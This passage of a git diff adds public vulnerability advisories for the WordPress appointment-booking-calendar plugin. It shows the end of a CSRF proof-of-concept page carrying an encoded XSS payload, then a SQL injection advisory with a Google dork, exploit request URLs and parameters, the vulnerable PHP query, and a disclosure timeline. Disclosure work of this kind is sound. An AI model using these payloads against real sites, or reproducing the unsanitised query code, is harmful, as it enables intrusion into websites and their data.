+        xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
+        xhr.send();
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+==========
+ CREDITS
+==========
+
+Vulnerability discovered by:
+	Joaquin Ramirez Martinez [i0 security-lab]
+	joaquin.ramirez.mtz.lab[at]yandex[dot]com
+	https://www.facebook.com/I0-security-lab-524954460988147/
+	https://www.youtube.com/user/strparser_lk
+
+
+========
+TIMELINE
+========
+
+2016-01-08 vulnerability discovered
+2016-01-24 reported to vendor
\ No newline at end of file
diff --git a/platforms/php/webapps/39342.txt b/platforms/php/webapps/39342.txt
new file mode 100755
index 000000000..e3d94c8b1
--- /dev/null
+++ b/platforms/php/webapps/39342.txt
@@ -0,0 +1,136 @@
+# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
+# Date: 2016-01-28
+# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
+# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
+# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Vendor: CodePeople.net
+# Vebdor URI: http://codepeople.net
+# Version: 1.1.24
+# OWASP Top10: A1-Injection
+# Tested on: windows 10 + firefox + sqlmap 1.0.
+
+===================
+PRODUCT DESCRIPTION
+===================
+"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
+a calendar**. The booking form is linked to a **PayPal** payment process.
+
+You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
+where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
+that can be accepted for each time-slot."
+
+(copy of readme file)
+
+
+======================
+EXPLOITATION TECHNIQUE
+======================
+remote
+
+==============
+SEVERITY LEVEL
+==============
+
+critical
+
+================================
+TECHNICAL DETAILS && DESCRIPTION
+================================
+
+A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
+
+The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
+The action is added with ´init´ tag, so it function is called every time when parameter 
+´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
+
+Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
+the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
+function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
+
+The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
+can compromise the entire web server.
+
+================
+PROOF OF CONCEPT
+================
+
+An unauthenticated attacker can make a request like...
+
+http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
+&cpabc_calendar_update=1&id=<owned calendar id>
+
+Example:
+
+	Exploiting simple SQL injection:
+
+	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
+	&cpabc_calendar_update=1&id=1
+	
+	Post data:
+	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
+	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&	imeWorkingDates6  
+
+All post variables are vulnerable to SQLi with ´addslashes´ bypass.
+
+===============
+VULNERABLE CODE
+===============
+
+located in ´cpabc_appointments.php´
+
+function cpabc_appointments_calendar_update() {
+    global $wpdb, $user_ID;
+
+	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
+		return;
+
+    $calid = intval(str_replace  (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
+    if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
+        return;
+echo "sa";
+    cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
+
+    //@ob_clean();
+    header("Cache-Control: no-store, no-cache, must-revalidate");
+    header("Pragma: no-cache");
+    if ( $user_ID )    
+        $wpdb->query("update  ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
+		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
+		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
+		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
+		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
+		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
+		."='".$_POST["timeWorkingDates6"]."'  where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
+
+    exit();
+}
+
+
+===========
+
+
+Note:
+cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
+
+
+==========
+ CREDITS
+==========
+
+Vulnerability discovered by:
+	Joaquin Ramirez Martinez [i0 security-lab]
+	strparser[at]gmail[dot]com
+	https://www.facebook.com/I0-security-lab-524954460988147/
+	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
+
+
+========
+TIMELINE
+========
+
+2016-01-08 vulnerability discovered
+2016-01-24 reported to vendor
+2016-01-27 released plugin version 1.1.25
+2016-01-28 public disclousure
+
+